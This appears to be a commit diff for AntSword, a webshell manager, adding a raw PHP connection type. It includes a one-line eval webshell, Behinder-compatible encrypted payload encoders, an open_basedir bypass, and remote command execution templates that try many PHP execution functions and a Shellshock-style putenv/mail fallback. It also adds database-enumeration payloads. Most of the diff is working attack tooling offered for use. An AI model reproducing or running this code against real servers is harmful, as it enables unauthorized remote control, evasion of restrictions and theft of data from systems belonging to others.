(Enhance: Core/PHPRAW) 新增 phpraw 类型

CHANGELOG.md

@@ -7,6 +7,21 @@
 ### 核心
 
 * 修复 PHP/PHP4 当前目录不可写时 bypass open_basedir 失败的 Bug
+* 新增 PHPRAW 类型, 该类型 webshell 支持的 WebShell 类似如下代码:
+
+```php
+<?php eval(file_get_contents("php://input"));>
+```
+
+> 为了方便直连 Behinder3 WebShell, 编码器已内置
+
+### 数据管理
+
+* 优化了编辑 Shell 信息时，URL后缀发生改变后连动修改「连接类型」功能
+
+### 后端模块
+
+* 支持自定义 Content-Type, 默认是 `form`
 
 ## 2021/07/25 `v(2.1.14)`
 

modules/request.js

@@ -110,17 +110,32 @@ class Request {
         .sender
         .send('request-error-' + opts['hash'], "Blacklist URL");
     }
+    let reqContentType = "form";
     let _request = superagent.post(opts['url']);
     // 设置headers
     _request.set('User-Agent', USER_AGENT.getRandom());
     // 自定义headers
     for (let _ in opts.headers) {
+      if (_.toLocaleLowerCase() == 'content-type') {
+        reqContentType = opts.headers[_];
+      }
       _request.set(_, opts.headers[_]);
     }
     // 自定义body
     let _postData = Object.assign({}, opts.body, opts.data);
     if (opts['useChunk'] == 1) {
       logger.debug("request with Chunked");
+      let antstream;
+      if (opts['useRaw'] == 1) {
+        // raw 模式 data 部分仅发送 pwd 键下的数据
+        let _tmp = encodeURIComponent(opts.data[opts['pwd']]).replace(/asunescape\((.+?)\)/g, function ($, $1) {
+          return unescape($1);
+        });
+        antstream = new AntRead(_tmp, {
+          'step': parseInt(opts['chunkStepMin']),
+          'stepmax': parseInt(opts['chunkStepMax'])
+        });
+      } else {
         let _postarr = [];
         for (var key in _postData) {
           if (_postData.hasOwnProperty(key)) {
@@ -130,14 +145,15 @@ class Request {
             _postarr.push(`${key}=${_tmp}`);
           }
         }
-      let antstream = new AntRead(_postarr.join("&"), {
+        antstream = new AntRead(_postarr.join("&"), {
           'step': parseInt(opts['chunkStepMin']),
           'stepmax': parseInt(opts['chunkStepMax'])
         });
+      }
       let _datasuccess = false; // 表示是否是 404 类shell
       _request
         .proxy(APROXY_CONF['uri'])
-        .type('form')
+        .type(reqContentType)
         // .set('Content-Type', 'application/x-www-form-urlencoded')
         .timeout(opts.timeout || REQ_TIMEOUT)
         .ignoreHTTPS(opts['ignoreHTTPS'])
@@ -188,6 +204,12 @@ class Request {
       // 通过替换函数方式来实现发包方式切换, 后续可改成别的
       const old_send = _request.send;
       let _postarr = [];
+      if (opts['useRaw'] == 1) {
+        let _tmp = String(opts.data[opts['pwd']]).replace(/asunescape\((.+?)\)/g, function ($, $1) {
+          return unescape($1);
+        });
+        _postarr = _tmp;
+      } else {
         if (opts['useMultipart'] == 1) {
           _request.send = _request.field;
           for (var key in _postData) {
@@ -219,9 +241,10 @@ class Request {
           //logger.debug(_postarr);
           _postarr = _postarr.join('&');
         }
+      }
       _request
         .proxy(APROXY_CONF['uri'])
-        .type('form')
+        .type(reqContentType)
         // 超时
         .timeout(opts.timeout || REQ_TIMEOUT)
         // 忽略HTTPS
@@ -292,18 +315,32 @@ class Request {
     let indexStart = -1;
     let indexEnd = -1;
     let tempData = [];
-
+    let reqContentType = "form";
     let _request = superagent.post(opts['url']);
     // 设置headers
     _request.set('User-Agent', USER_AGENT.getRandom());
     // 自定义headers
     for (let _ in opts.headers) {
+      if (_.toLocaleLowerCase() == 'content-type') {
+        reqContentType = opts.headers[_];
+      }
       _request.set(_, opts.headers[_]);
     }
     // 自定义body
     let _postData = Object.assign({}, opts.body, opts.data);
     if (opts['useChunk'] == 1) {
       logger.debug("request with Chunked");
+      let antstream;
+      if (opts['useRaw'] == 1) {
+        // raw 模式 data 部分仅发送 pwd 键下的数据
+        let _tmp = encodeURIComponent(opts.data[opts['pwd']]).replace(/asunescape\((.+?)\)/g, function ($, $1) {
+          return unescape($1);
+        });
+        antstream = new AntRead(_tmp, {
+          'step': parseInt(opts['chunkStepMin']),
+          'stepmax': parseInt(opts['chunkStepMax'])
+        });
+      } else {
         let _postarr = [];
         for (var key in _postData) {
           if (_postData.hasOwnProperty(key)) {
@@ -313,13 +350,14 @@ class Request {
             _postarr.push(`${key}=${_tmp}`);
           }
         }
-      let antstream = new AntRead(_postarr.join("&"), {
+        antstream = new AntRead(_postarr.join("&"), {
           'step': parseInt(opts['chunkStepMin']),
           'stepmax': parseInt(opts['chunkStepMax'])
         });
+      }
       _request
         .proxy(APROXY_CONF['uri'])
-        .type('form')
+        .type(reqContentType)
         .ignoreHTTPS(opts['ignoreHTTPS'])
         .parse((res, callback) => {
           res.pipe(through((chunk) => {
@@ -358,6 +396,12 @@ class Request {
       // 通过替换函数方式来实现发包方式切换, 后续可改成别的
       const old_send = _request.send;
       let _postarr = [];
+      if (opts['useRaw'] == 1) {
+        let _tmp = String(opts.data[opts['pwd']]).replace(/asunescape\((.+?)\)/g, function ($, $1) {
+          return unescape($1);
+        });
+        _postarr = _tmp;
+      } else {
         if (opts['useMultipart'] == 1) {
           _request.send = _request.field;
           for (var key in _postData) {
@@ -387,9 +431,10 @@ class Request {
           }
           _postarr = _postarr.join('&');
         }
+      }
       _request
         .proxy(APROXY_CONF['uri'])
-        .type('form')
+        .type(reqContentType)
         // 设置超时会导致文件过大时写入出错 .timeout(timeout) 忽略HTTPS
         .ignoreHTTPS(opts['ignoreHTTPS'])
         .send(_postarr)

source/app.entry.js

@@ -168,7 +168,7 @@ const antSword = window.antSword = {
 };
 
 //核心模块类型列表
-antSword['core_types'] = ['asp','aspx','php','php4','jsp','jspjs','cmdlinux','custom'];
+antSword['core_types'] = ['asp','aspx','php','php4','jsp','jspjs','cmdlinux','custom', 'phpraw'];
 
 // 加载核心模板
 antSword['core'] = require('./core/');

source/core/base.js

@@ -349,6 +349,7 @@ class Base {
         // 发送请求数据
         .send('request', {
           url: this.__opts__['url'],
+          pwd: this.__opts__['pwd'],
           hash: hash,
           data: opt['data'],
           tag_s: opt['tag_s'],
@@ -362,6 +363,7 @@ class Base {
           addMassData: (this.__opts__['otherConf'] || {})['add-MassData'] === 1,
           randomPrefix: parseInt((this.__opts__['otherConf'] || {})['random-Prefix']),
           useRandomVariable: (this.__opts__['otherConf'] || {})['use-random-variable'] === 1,
+          useRaw: this.__opts__['type'].endsWith("raw"),
           timeout: parseInt((this.__opts__['otherConf'] || {})['request-timeout']),
           headers: (this.__opts__['httpConf'] || {})['headers'] || {},
           body: (this.__opts__['httpConf'] || {})['body'] || {}

source/core/phpraw/decoder/base64.js

+/**
+ * php::base64解码器
+ */
+
+'use strict';
+
+module.exports = {
+  /**
+   * @returns {string} asenc 将返回数据base64编码
+   */
+  asoutput: () => {
+    return `function asenc($out){
+      return @base64_encode($out);
+    }
+    `.replace(/\n\s+/g, '');
+  },
+  /**
+   * 解码 Buffer
+   * @param {Buffer} buff 要被解码的 Buffer
+   * @returns {Buffer} 解码后的 Buffer
+   */
+  decode_buff: (buff) => {
+    return Buffer.from(buff.toString(), 'base64');
+  }
+}
\ No newline at end of file

source/core/phpraw/decoder/default.js

+/**
+ * php::default解码器
+ */
+
+'use strict';
+
+module.exports = {
+  /**
+   * @returns {string} asenc 加密返回数据的函数
+   */
+  asoutput: () => {
+    return `function asenc($out){
+        return $out;
+      }
+    `.replace(/\n\s+/g, '');
+  },
+  /**
+   * 解码 Buffer
+   * @param {Buffer} buff 要被解码的 Buffer
+   * @returns {Buffer} 解码后的 Buffer
+   */
+  decode_buff: (buff) => {
+    return buff;
+  }
+}
\ No newline at end of file

source/core/phpraw/decoder/rot13.js

+/**
+ * php::base64解码器
+ * ? 利用php的base64_decode进行解码处理
+ */
+
+'use strict';
+const rot13encode = (s) => {
+  //use a Regular Expression to Replace only the characters that are a-z or A-Z
+  return s.replace(/[a-zA-Z]/g, function (c) {
+    // Get the character code of the current character and add 13 to it If it is
+    // larger than z's character code then subtract 26 to support wrap around.
+    return String.fromCharCode((c <= "Z" ?
+        90 :
+        122) >= (c = c.charCodeAt(0) + 13) ?
+      c :
+      c - 26);
+  });
+};
+
+module.exports = {
+  asoutput: (tag_s, tag_e) => {
+    return `function asenc($out){
+      return str_rot13($out);
+    }
+    `.replace(/\n\s+/g, '');
+  },
+  decode_buff: (buff) => {
+    return Buffer.from(rot13encode(buff.toString()));
+  }
+}
\ No newline at end of file

source/core/phpraw/encoder/base64.js

+'use strict';
+
+module.exports = (pwd, data, ext = null) => {
+  data[pwd] = Buffer.from(data['_']).toString('base64');
+  delete data['_'];
+  return data;
+}

source/core/phpraw/encoder/behinder3.js

+/**
+ * php:: behinder AES 编码器
+ * Create at: 2021/01/10 01:10:53
+ * 
+ */
+
+'use strict';
+var CryptoJS = require('crypto-js');
+
+function decryptText(keyStr, text) {
+  let buff = Buffer.alloc(16, 'a');
+  buff.write(keyStr,0);
+  keyStr = buff.toString();
+  let decodetext = CryptoJS.AES.decrypt(text, CryptoJS.enc.Utf8.parse(keyStr), {
+    mode: CryptoJS.mode.CBC,
+    padding: CryptoJS.pad.Pkcs7,
+    iv: CryptoJS.enc.Utf8.parse(Buffer.alloc(16)),
+  }).toString(CryptoJS.enc.Utf8);
+  return decodetext;
+}
+
+function encryptText(keyStr, text) {
+  let buff = Buffer.alloc(16, 'a');
+  buff.write(keyStr,0);
+  keyStr = buff.toString();
+  let encodetext = CryptoJS.AES.encrypt(text, CryptoJS.enc.Utf8.parse(keyStr), {
+    mode: CryptoJS.mode.CBC,
+    padding: CryptoJS.pad.Pkcs7,
+    iv: CryptoJS.enc.Utf8.parse(Buffer.alloc(16)),
+  }).toString();
+  return encodetext;
+}
+
+/*
+* @param  {String} pwd   连接密码
+* @param  {Array}  data  编码器处理前的 payload 数组
+* @return {Array}  data  编码器处理后的 payload 数组
+*/
+module.exports = (pwd, data, ext={}) => {
+  let randomID;
+  if (ext.opts.otherConf['use-random-variable'] === 1) {
+    randomID = antSword.utils.RandomChoice(antSword['RANDOMWORDS']);
+  } else {
+    randomID = `${antSword['utils'].RandomLowercase()}${Math.random().toString(16).substr(2)}`;
+  }
+  let key = CryptoJS.MD5(pwd).toString().substr(0,16);
+  data[pwd] = encryptText(key, `${randomID}|@eval(base64_decode("${Buffer.from(data['_']).toString("base64")}"));`);
+  delete data['_'];
+  return data;
+}

source/core/phpraw/encoder/behinder3xor.js

+/**
+ * php:: behinder XOR 编码器, 无 openssl 扩展时使用
+ * Create at: 2021/01/10 01:10:53
+ * 
+ */
+ 'use strict';
+ var CryptoJS = require('crypto-js');
+ /*
+ * @param  {String} pwd   连接密码
+ * @param  {Array}  data  编码器处理前的 payload 数组
+ * @return {Array}  data  编码器处理后的 payload 数组
+ */
+module.exports = (pwd, data, ext={}) => {
+  let randomID;
+  if (ext.opts.otherConf['use-random-variable'] === 1) {
+    randomID = antSword.utils.RandomChoice(antSword['RANDOMWORDS']);
+  } else {
+    randomID = `${antSword['utils'].RandomLowercase()}${Math.random().toString(16).substr(2)}`;
+  }
+  let dataarr = Buffer.from(`${randomID}|@eval(base64_decode("${Buffer.from(data['_']).toString("base64")}"));`);
+  let keyarr = Buffer.from(CryptoJS.MD5(pwd).toString().substr(0,16));
+  for (let i = 0; i < dataarr.length; i++) {
+    dataarr[i] = dataarr[i] ^ keyarr[i + 1 & 15];
+  }
+  data[pwd] = dataarr.toString("base64");
+  delete data['_'];
+  return data;
+}

source/core/phpraw/encoder/hex.js

+'use strict'
+
+module.exports = (pwd, data, ext = null) => {
+
+  // 编码并去除多余数据
+  data[pwd] = Buffer.from(data['_']).toString("hex");
+  delete data['_'];
+  // 返回数据
+  return data;
+}

source/core/phpraw/index.js

+'use strict';
+
+// import Base from '../base';
+const Base = require('../base');
+
+class PHPRAW extends Base {
+  constructor(opts) {
+    super(opts);
+    // 解析模板
+    [
+      'base',
+      'command',
+      'filemanager',
+      'database/mysql',
+      'database/mysqli',
+      'database/mssql',
+      'database/sqlsrv',
+      'database/oracle',
+      'database/oracle_oci8',
+      'database/postgresql',
+      'database/postgresql_pdo',
+      'database/sqlite3',
+      'database/sqlite_pdo',
+    ].map((_) => {
+      this.parseTemplate(`./phpraw/template/${_}`);
+    });
+    // 解析编码器
+    this
+      .encoders
+      .map((_) => {
+        this.parseEncoder(`./phpraw/encoder/${_}`);
+      });
+    this
+      .decoders
+      .map((_) => {
+        this.parseDecoder(`./phpraw/decoder/${_}`);
+      });
+  }
+
+  /**
+   * 获取编码器列表
+   * ? 可以在antSword.core.php.prototype.encoders中获取此变量
+   * @return {array} 编码器列表
+   */
+  get encoders() {
+    return ["base64", "hex", "behinder3", "behinder3xor"];
+  }
+
+  get decoders() {
+    return ["default", "base64", "rot13"];
+  }
+  /**
+   * HTTP请求数据组合函数
+   * @param  {Object} data 通过模板解析后的代码对象
+   * @param {bool} force_default 强制使用 default 解码
+   * @return {Promise}     返回一个Promise操作对象
+   */
+  complete(data, force_default = false) {
+    // 分隔符号
+    let tag_s, tag_e;
+    if (this.__opts__['otherConf'].hasOwnProperty('use-custom-datatag') && this.__opts__['otherConf']['use-custom-datatag'] == 1 && this.__opts__['otherConf']['custom-datatag-tags']) {
+      tag_s = this.__opts__['otherConf']['custom-datatag-tags'];
+    } else {
+      tag_s = Math.random().toString(16).substr(2, parseInt(Math.random() * 8 + 5)); // "->|";
+    }
+    if (this.__opts__['otherConf'].hasOwnProperty('use-custom-datatag') && this.__opts__['otherConf']['use-custom-datatag'] == 1 && this.__opts__['otherConf']['custom-datatag-tage']) {
+      tag_e = this.__opts__['otherConf']['custom-datatag-tage'];
+    } else {
+      tag_e = Math.random().toString(16).substr(2, parseInt(Math.random() * 8 + 5)); // "|<-";
+    }
+
+    let asencCode;
+    let ext = {
+      opts: this.__opts__,
+    };
+    if (!force_default) {
+      asencCode = this.__decoder__[this.__opts__['decoder'] || 'default'].asoutput(ext);
+    } else {
+      asencCode = this.__decoder__['default'].asoutput(ext);
+    }
+    // 组合完整的代码
+    // @chdir('.');@ini_set('open_basedir','..');for($i=0;$i<10;$i++){@chdir('..');}@ini_set('open_basedir','/');
+    let tmpCode = data['_'];
+    let opdir = Math.random().toString(16).substr(2, parseInt(Math.random() * 8 + 5));
+    let bypassOpenBaseDirCode = `
+    $opdir=@ini_get("open_basedir");
+    if($opdir) {
+        $ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);
+        $oparr=preg_split(base64_decode("/;|:/"),$opdir);
+        @array_push($oparr,$ocwd,sys_get_temp_dir());
+        foreach($oparr as $item) {
+            if(!@is_writable($item)){
+                continue;
+            };
+            $tmdir=$item."/.${opdir}";
+            @mkdir($tmdir);
+            if(!@file_exists($tmdir)){
+                continue;
+            }
+            @chdir($tmdir);
+            @ini_set("open_basedir", "..");
+            $cntarr=@preg_split("/\\\\\\\\|\\//",$tmdir);
+            for($i=0;$i<sizeof($cntarr);$i++){
+                @chdir("..");
+            };
+            @ini_set("open_basedir","/");
+            @rmdir($tmdir);
+            break;
+        };
+    };`.replace(/\n\s+/g, '');
+    data['_'] = `@ini_set("display_errors", "0");@set_time_limit(0);${bypassOpenBaseDirCode};${asencCode};function asoutput(){$output=ob_get_contents();ob_end_clean();echo "${tag_s.substr(0,tag_s.length/2)}"."${tag_s.substr(tag_s.length/2)}";echo @asenc($output);echo "${tag_e.substr(0,tag_e.length/2)}"."${tag_e.substr(tag_e.length/2)}";}ob_start();try{${tmpCode};}catch(Exception $e){echo "ERROR://".$e->getMessage();};asoutput();die();`;
+
+    // 使用编码器进行处理并返回
+    return this.encodeComplete(tag_s, tag_e, data);
+  }
+}
+
+module.exports = PHPRAW;
\ No newline at end of file

source/core/phpraw/template/base.js

+/**
+ * 基础信息模板
+ * ? 获取系统信息、当前用户、当前路径、盘符列表
+ */
+
+module.exports = () => ({
+  info: {
+    _: `$D=dirname($_SERVER["SCRIPT_FILENAME"]);
+    if($D=="")
+      $D=dirname($_SERVER["PATH_TRANSLATED"]);
+    $R="{$D}\t";
+    if(substr($D,0,1)!="/"){
+      foreach(range("C","Z")as $L)
+        if(is_dir("{$L}:"))$R.="{$L}:";
+    }else{
+      $R.="/";
+    }
+    $R.="\t";
+    $u=(function_exists("posix_getegid"))?@posix_getpwuid(@posix_geteuid()):"";
+    $s=($u)?$u["name"]:@get_current_user();
+    $R.=php_uname();
+    $R.="\t{$s}";
+    echo $R;`.replace(/\n\s+/g, '')
+  },
+  probedb: { // 检测数据库函数支持
+    _: `$m=array('mysql_close','mysqli_close','mssql_close','sqlsrv_close','ora_close','oci_close','ifx_close','sqlite_close','pg_close','dba_close','dbmclose','filepro_fieldcount','sybase_close');
+    foreach ($m as $f) {
+      echo($f."\\t".(function_exists($f)?'1':'0')."\\n");
+    };
+    $n=array('SQLite3');
+    foreach ($n as $f) {
+      echo($f."\\t".(class_exists($f)?'1':'0')."\\n");
+    };
+    if(function_exists('pdo_drivers')){
+      foreach(@pdo_drivers() as $f){
+        echo("pdo_".$f."\\t1\\n");
+      }
+    }`.replace(/\n\s+/g, '')
+  }
+})
\ No newline at end of file

source/core/phpraw/template/command.js

+/**
+ * 虚拟终端命令执行
+ */
+
+module.exports = (arg1, arg2, arg3) => ({
+  exec: {
+    _: `$p=base64_decode(substr("#{newbase64::bin}",#randomPrefix#));
+      $s=base64_decode(substr("#{newbase64::cmd}",#randomPrefix#));
+      $envstr=@base64_decode(substr("#{newbase64::env}",#randomPrefix#));
+      $d=dirname($_SERVER["SCRIPT_FILENAME"]);
+      $c=substr($d,0,1)=="/"?"-c \\"{$s}\\"":"/c \\"{$s}\\"";
+      if(substr($d,0,1)=="/"){
+        @putenv("PATH=".getenv("PATH").":/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin");
+      }else{
+        @putenv("PATH=".getenv("PATH").";C:/Windows/system32;C:/Windows/SysWOW64;C:/Windows;C:/Windows/System32/WindowsPowerShell/v1.0/;");
+      }
+      if(!empty($envstr)){
+        $envarr=explode("|||asline|||", $envstr);
+        foreach($envarr as $v) {
+          if (!empty($v)) {
+            @putenv(str_replace("|||askey|||", "=", $v));
+          }
+        }
+      }
+      $r="{$p} {$c}";
+      function fe($f){
+        $d=explode(",",@ini_get("disable_functions"));
+        if(empty($d)){
+          $d=array();
+        }else{
+          $d=array_map('trim',array_map('strtolower',$d));
+        }
+        return(function_exists($f)&&is_callable($f)&&!in_array($f,$d));
+      };
+      function runshellshock($d, $c) {
+        if (substr($d, 0, 1) == "/" && fe('putenv') && (fe('error_log') || fe('mail'))) {
+          if (strstr(readlink("/bin/sh"), "bash") != FALSE) {
+            $tmp = tempnam(sys_get_temp_dir(), 'as');
+            putenv("PHP_LOL=() { x; }; $c >$tmp 2>&1");
+            if (fe('error_log')) {
+              error_log("a", 1);
+            } else {
+              mail("a@127.0.0.1", "", "", "-bv");
+            }
+          } else {
+            return False;
+          }
+          $output = @file_get_contents($tmp);
+          @unlink($tmp);
+          if ($output != "") {
+            print($output);
+            return True;
+          }
+        }
+        return False;
+      };
+      function runcmd($c){
+        $ret=0;
+        $d=dirname($_SERVER["SCRIPT_FILENAME"]);
+        if(fe('system')){
+          @system($c,$ret);
+        }elseif(fe('passthru')){
+          @passthru($c,$ret);
+        }elseif(fe('shell_exec')){
+          print(@shell_exec($c));
+        }elseif(fe('exec')){
+          @exec($c,$o,$ret);
+          print(join("\n",$o));
+        }elseif(fe('popen')){
+          $fp=@popen($c,'r');
+          while(!@feof($fp)){
+            print(@fgets($fp,2048));
+          }
+          @pclose($fp);
+        }elseif(fe('proc_open')){
+          $p = @proc_open($c, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io);
+          while(!@feof($io[1])){
+            print(@fgets($io[1],2048));
+          }
+          while(!@feof($io[2])){
+            print(@fgets($io[2],2048));
+          }
+          @fclose($io[1]);
+          @fclose($io[2]);
+          @proc_close($p);
+        }elseif(fe('antsystem')){
+          @antsystem($c);
+        }elseif(runshellshock($d, $c)) {
+          return $ret;
+        }elseif(substr($d,0,1)!="/" && @class_exists("COM")){
+          $w=new COM('WScript.shell');
+          $e=$w->exec($c);
+          $so=$e->StdOut();
+          $ret.=$so->ReadAll();
+          $se=$e->StdErr();
+          $ret.=$se->ReadAll();
+          print($ret);
+        }else{
+          $ret = 127;
+        }
+        return $ret;
+      };
+      $ret=@runcmd($r." 2>&1");
+      print ($ret!=0)?"ret={$ret}":"";`.replace(/\n\s+/g, ''),
+  },
+  listcmd: {
+    _: `$arr=explode(",",base64_decode(substr("#{newbase64::binarr}",#randomPrefix#)));
+    foreach($arr as $v){
+        echo($v."\t".(file_exists($v)?"1":"0")."\n");
+    }`.replace(/\n\s+/g, ''),
+  },
+  quote: {
+    _: `$p=base64_decode(substr("#{newbase64::bin}",#randomPrefix#));$s=base64_decode(substr("#{newbase64::cmd}",#randomPrefix#));$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \\"{$s}\\"":"/c \\"{$s}\\"";$r="{$p} {$c}";echo \`{$r} 2>&1\``,
+  }
+})
\ No newline at end of file

source/core/phpraw/template/database/mssql.js

+/**
+ * 数据库管理模板::mssql
+ * i 数据分隔符号 => \t|\t
+ */
+
+module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({
+  // 显示所有数据库
+  show_databases: {
+    _: `
+      $hst=base64_decode("#{base64::host}");
+      $usr=base64_decode("#{base64::user}");
+      $pwd=base64_decode("#{base64::passwd}");
+      $T=@mssql_connect($hst,$usr,$pwd);
+      $q=@mssql_query("select [name] from master.dbo.sysdatabases order by 1",$T);
+      while($rs=@mssql_fetch_row($q)){
+        echo(trim($rs[0]).chr(9));
+      }
+      @mssql_free_result($q);
+      @mssql_close($T);`.replace(/\n\s+/g, ''),
+  },
+  // 显示数据库所有表
+  show_tables: {
+    _: `
+      $hst=base64_decode("#{base64::host}");
+      $usr=base64_decode("#{base64::user}");
+      $pwd=base64_decode("#{base64::passwd}");
+      $dbn=base64_decode("#{base64::db}");
+      $T=@mssql_connect($hst,$usr,$pwd);
+      @mssql_select_db($dbn,$T);
+      $q=@mssql_query("SELECT [name] FROM sysobjects WHERE xtype='U' ORDER BY 1",$T);
+      while($rs=@mssql_fetch_row($q)){
+        echo(trim($rs[0]).chr(9));
+      }
+      @mssql_free_result($q);
+      @mssql_close($T);`.replace(/\n\s+/g, ''),
+  },
+  // 显示表字段
+  show_columns: {
+    _: `
+      $hst=base64_decode("#{base64::host}");
+      $usr=base64_decode("#{base64::user}");
+      $pwd=base64_decode("#{base64::passwd}");
+      $dbn=base64_decode("#{base64::db}");
+      $tab=base64_decode("#{base64::table}");
+      $T=@mssql_connect($hst,$usr,$pwd);
+      @mssql_select_db($dbn,$T);
+      $q=@mssql_query("SELECT TOP 1 * FROM {$tab}",$T);
+      while($rs=@mssql_fetch_field($q)){
+        echo(trim($rs->name)." ({$rs->type}({$rs->max_length}))".chr(9));
+      }
+      @mssql_free_result($q);
+      @mssql_close($T);`.replace(/\n\s+/g, ''),
+  },
+  // 执行SQL语句
+  query: {
+    _: `
+      $hst=base64_decode("#{base64::host}");
+      $usr=base64_decode("#{base64::user}");
+      $pwd=base64_decode("#{base64::passwd}");
+      $dbn=base64_decode("#{base64::db}");
+      $sql=base64_decode("#{base64::sql}");
+      $T=@mssql_connect($hst,$usr,$pwd);
+      @mssql_select_db($dbn,$T);
+      $q=@mssql_query($sql,$T);
+      if(is_bool($q)){
+        echo("Status\\t|\\tAffect Rows\\t|\\t\\r\\n".($q?"VHJ1ZQ==":"RmFsc2U=")."\\t|\\t".base64_encode(@mssql_rows_affected($T)." row(s)")."\\t|\\t\\r\\n");
+      }else{
+        $i=0;
+        while($rs=@mssql_fetch_field($q)){
+          echo($rs->name."\\t|\\t");
+          $i++;
+        }
+        echo("\\r\\n");
+        while($rs=@mssql_fetch_row($q)){
+          for($c=0;$c<$i;$c++){
+            echo(base64_encode(trim($rs[$c])));
+            echo("\\t|\\t");
+          }
+          echo("\\r\\n");
+        }
+        @mssql_free_result($q);
+      }
+      @mssql_close($T);`.replace(/\n\s+/g, ''),
+  }
+})
\ No newline at end of file

source/core/phpraw/template/database/mysql.js

+/**
+ * 数据库管理模板::mysql
+ * i 数据分隔符号 => \t|\t
+ */
+
+module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({
+  // 显示所有数据库
+  show_databases: {
+    _: `
+    $hst=base64_decode("#{base64::host}");
+    $usr=base64_decode("#{base64::user}");
+    $pwd=base64_decode("#{base64::passwd}");
+    $T=@mysql_connect($hst,$usr,$pwd);
+    $q=@mysql_query("SHOW DATABASES");
+    while($rs=@mysql_fetch_row($q)){
+      echo(trim($rs[0]).chr(9));
+    }
+    @mysql_close($T);`.replace(/\n\s+/g, ''),
+  },
+  // 显示数据库所有表
+  show_tables: {
+    _: `
+    $hst=base64_decode("#{base64::host}");
+    $usr=base64_decode("#{base64::user}");
+    $pwd=base64_decode("#{base64::passwd}");
+    $dbn=base64_decode("#{base64::db}");
+    $T=@mysql_connect($hst,$usr,$pwd);
+    $q=@mysql_query("SHOW TABLES FROM \`{$dbn}\`");
+    while($rs=@mysql_fetch_row($q)){
+      echo(trim($rs[0]).chr(9));
+    }
+    @mysql_close($T);`.replace(/\n\s+/g, ''),
+  },
+  // 显示表字段
+  show_columns: {
+    _: `
+    $hst=base64_decode("#{base64::host}");
+    $usr=base64_decode("#{base64::user}");
+    $pwd=base64_decode("#{base64::passwd}");
+    $dbn=base64_decode("#{base64::db}");
+    $tab=base64_decode("#{base64::table}");
+    $T=@mysql_connect($hst,$usr,$pwd);
+    @mysql_select_db( $dbn, $T);
+    $q=@mysql_query("SHOW COLUMNS FROM \`{$tab}\`");
+    while($rs=@mysql_fetch_row($q)){
+      echo(trim($rs[0])." (".$rs[1].")".chr(9));
+    }
+    @mysql_close($T);`.replace(/\n\s+/g, ''),
+  },
+  // 执行SQL语句
+  query: {
+    _: `
+    $hst=base64_decode("#{base64::host}");
+    $usr=base64_decode("#{base64::user}");
+    $pwd=base64_decode("#{base64::passwd}");
+    $dbn=base64_decode("#{base64::db}");
+    $sql=base64_decode("#{base64::sql}");
+    $T=@mysql_connect($hst,$usr,$pwd);
+    @mysql_query("SET NAMES ".base64_decode("#{base64::encode}"));
+    @mysql_select_db($dbn, $T);
+    $q=@mysql_query($sql);
+    if(is_bool($q)){
+      echo("Status\\t|\\t\\r\\n".($q?"VHJ1ZQ==":"RmFsc2U=")."\\t|\\t\\r\\n");
+    }else{
+      $i=0;
+      while($col=@mysql_fetch_field($q)){
+        echo($col->name."\\t|\\t");
+        $i++;
+      }
+      echo("\\r\\n");
+      while($rs=@mysql_fetch_row($q)){
+        for($c=0;$c<$i;$c++){
+          echo(base64_encode(trim($rs[$c])));
+          echo("\\t|\\t");
+        }
+        echo("\\r\\n");
+      }
+    }
+    @mysql_close($T);`.replace(/\n\s+/g, ''),
+  }
+})
\ No newline at end of file

source/core/phpraw/template/database/mysqli.js

+/**
+ * 数据库管理模板::mysql
+ * i 数据分隔符号 => \t|\t
+ */
+
+module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({
+  // 显示所有数据库
+  show_databases: {
+    _: `
+      $hst=base64_decode("#{base64::host}");
+      $usr=base64_decode("#{base64::user}");
+      $pwd=base64_decode("#{base64::passwd}");
+      list($hst, $port) = explode(":", $hst);
+      $port == "" ? $port = "3306" : $port;
+      $T=@mysqli_connect($hst,$usr,$pwd,"",$port);
+      $q=@mysqli_query($T,"SHOW DATABASES");
+      while($rs=@mysqli_fetch_row($q)){
+        echo(trim($rs[0]).chr(9));
+      }
+      @mysqli_close($T);`.replace(/\n\s+/g, ''),
+  },
+  // 显示数据库所有表
+  show_tables: {
+    _: `
+      $hst=base64_decode("#{base64::host}");
+      $usr=base64_decode("#{base64::user}");
+      $pwd=base64_decode("#{base64::passwd}");
+      $dbn=base64_decode("#{base64::db}");
+      list($hst, $port) = explode(":", $hst);
+      $port == "" ? $port = "3306" : $port;
+      $T=@mysqli_connect($hst,$usr,$pwd,"",$port);
+      $q=@mysqli_query($T, "SHOW TABLES FROM \`{$dbn}\`");
+      while($rs=@mysqli_fetch_row($q)){
+        echo(trim($rs[0]).chr(9));
+      }
+      @mysqli_close($T);`.replace(/\n\s+/g, ''),
+  },
+  // 显示表字段
+  show_columns: {
+    _: `
+      $hst=base64_decode("#{base64::host}");
+      $usr=base64_decode("#{base64::user}");
+      $pwd=base64_decode("#{base64::passwd}");
+      $dbn=base64_decode("#{base64::db}");
+      $tab=base64_decode("#{base64::table}");
+      list($hst, $port) = explode(":", $hst);
+      $port == "" ? $port = "3306" : $port;
+      $T=@mysqli_connect($hst,$usr,$pwd,"",$port);
+      @mysqli_select_db($T, $dbn);
+      $q=@mysqli_query($T, "SHOW COLUMNS FROM \`{$tab}\`");
+      while($rs=@mysqli_fetch_row($q)){
+        echo(trim($rs[0])." (".$rs[1].")".chr(9));
+      }
+      @mysqli_close($T);`.replace(/\n\s+/g, ''),
+  },
+  // 执行SQL语句
+  query: {
+    _: `
+      $hst=base64_decode("#{base64::host}");
+      $usr=base64_decode("#{base64::user}");
+      $pwd=base64_decode("#{base64::passwd}");
+      $dbn=base64_decode("#{base64::db}");
+      $sql=base64_decode("#{base64::sql}");
+      list($hst, $port) = explode(":", $hst);
+      $port == "" ? $port = "3306" : $port;
+      $T=@mysqli_connect($hst,$usr,$pwd,"",$port);
+      @mysqli_query($T,"SET NAMES ".base64_decode("#{base64::encode}"));
+      @mysqli_select_db($T,$dbn);
+      $q=@mysqli_query($T,$sql);
+      if(is_bool($q)){
+        echo("Status\\t|\\t\\r\\n".($q?"VHJ1ZQ==":"RmFsc2U=")."\\t|\\t\\r\\n");
+      }else{
+        $i=0;
+        while($col=@mysqli_fetch_field($q)){echo($col->name."\t|\t");
+        $i++;
+      }
+      echo("\\r\\n");
